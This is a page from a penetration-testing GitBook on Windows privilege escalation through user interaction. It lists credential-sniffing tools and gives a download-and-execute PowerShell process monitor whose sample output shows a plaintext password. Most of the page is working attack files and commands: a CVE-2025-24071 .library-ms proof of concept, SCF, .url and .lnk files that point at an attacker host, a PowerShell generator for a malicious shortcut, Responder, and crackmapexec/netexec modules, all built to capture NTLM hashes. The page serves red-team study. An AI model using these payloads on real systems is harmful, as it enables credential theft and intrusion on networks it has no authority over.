Interacting with Users

Traffic Capture

How to Find Passwords Using WiresharkInstructables

Network Attacks

Tools

GitHub - DanMcInerney/net-creds: Sniffs sensitive data from interface or pcapGitHub

net-creds

GitHub - lgandx/PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.GitHub

PCreds

GitHub - odedshimon/BruteShark: Network Analysis ToolGitHub

BruteShark

GitHub - ShellCode33/CredSLayer: Extract credentials and other useful info from network capturesGitHub

CredSLayer

NetworkMiner - The NSM and Network Forensics Analysis Tool ⛏Netresec

NetMiner - Free Version

GitHub - mlgualtieri/NTLMRawUnHide: NTLMRawUnhide.py is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The following binary network packet capture formats are supported: *.pcap *.pcapng *.cap *.etlGitHub

Monitoring for Process Command Lines

procmon.ps1

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1') 

InputObject                                           SideIndicator
-----------                                           -------------
@{CommandLine=C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}} =>      
@{CommandLine=“C:\Windows\system32\cmd.exe” }                          =>      
@{CommandLine=\??\C:\Windows\system32\conhost.exe 0x4}                      =>      
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd}       =>       
@{CommandLine=“C:\Windows\system32\backgroundTaskHost.exe” -ServerName:CortanaUI.AppXy7vb4pc2... <=

Vulnerable Services

Docker Desktop Community Edition before 2.1.0.1.

Elevation of Privilege in Docker for WindowsMedium

The program looks for docker-credential-wincred.exe and docker-credential-wincred.bat files in the C:\PROGRAMDATA\DockerDesktop\version-bin\. This directory was misconfigured to allow full write access to the BUILTIN\Users group, meaning that any authenticated user on the system could write a file into it (such as a malicious executable).

Any executable placed in that directory would run when a) the Docker application starts and b) when a user authenticates using the command docker login.

CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File

GitHub - 0x6rss/CVE-2025-24071_PoC: CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms FileGitHub

CVE-2025-24054, NTLM Exploit in the Wild - Check Point ResearchCheck Point Research

poc.library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="<http://schemas.microsoft.com/windows/2009/library>">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\ATTACKER_IP\\SHARE_NAME</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

SCF on a File Share

Using SCFs no longer works on Server 2019 hosts, but we can achieve the same effect using a malicious .lnk file.

@Inventory.scf

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

sudo responder -wrf -v -I tun0

ntlm_theft

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

ntlm_theft supports the following attack types:

• Browse to Folder Containing

  • .url – via URL field

  • .url – via ICONFILE field

  • .lnk - via icon_location field

  • .scf – via ICONFILE field (Not Working on Latest Windows)

  • autorun.inf via OPEN field (Not Working on Latest Windows)

  • desktop.ini - via IconResource field (Not Working on Latest Windows)

• Open Document

  • .xml – via Microsoft Word external stylesheet

  • .xml – via Microsoft Word includepicture field

  • .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)

  • .docx – via Microsoft Word includepicture field

  • .docx – via Microsoft Word external template

  • .docx – via Microsoft Word frameset webSettings

  • .xlsx - via Microsoft Excel external cell

  • .wax - via Windows Media Player playlist (Better, primary open)

  • .asx – via Windows Media Player playlist (Better, primary open)

  • .m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)

  • .jnlp – via Java external jar

  • .application – via any Browser (Must be served via a browser downloaded or won’t run)

• Open Document and Accept Popup

  • .pdf – via Adobe Acrobat Reader

• Click Link in Chat Program

  • .txt – formatted link to paste into Zoom chat

CME

crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP

Rocabella

GitHub - nickvourd/Rocabella: Sniffing files generatorGitHub

LNK File on a File Share

lnkdomb

GitHub - dievus/lnkbomb: Malicious shortcut generator for collecting NTLM hashes from insecure file shares.GitHub

Generating a Malicious .lnk File

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Netexec

NTLM Relaying - Making the Old New Again | JUMPSEC LABSJUMPSEC LABS

nxc smb IP -u username -p password -d domain.local -M slinky -o NAME=Shortcut SERVER=ATTACKER_IP

Rocabella

GitHub - nickvourd/Rocabella: Sniffing files generatorGitHub

URL Files on a File Share

This attack also works with .url files and responder -I eth0 -v

[InternetShortcut] 
URL=whatever 
WorkingDirectory=whatever 
IconFile=\10.10.10.10%USERNAME%.icon 
IconIndex=1

Obfuscated Files

Word, ppt, scf, lnk, etc

GitHub - sevagas/macro_pack: macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research.GitHub

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Pentesting Active Directory and Windows-based Infrastructure Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations

• Infrastructure Attack Strategies for Ethical Hacking Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.

• RTFM: Red Team Field Manual v2 A quick reference when there is no time to scour the Internet for that perfect command

• Red Team Development and Operations: A practical guide The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.

• Cybersecurity Attacks – Red Team Strategies A practical guide to building a penetration testing program having homefield advantage

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.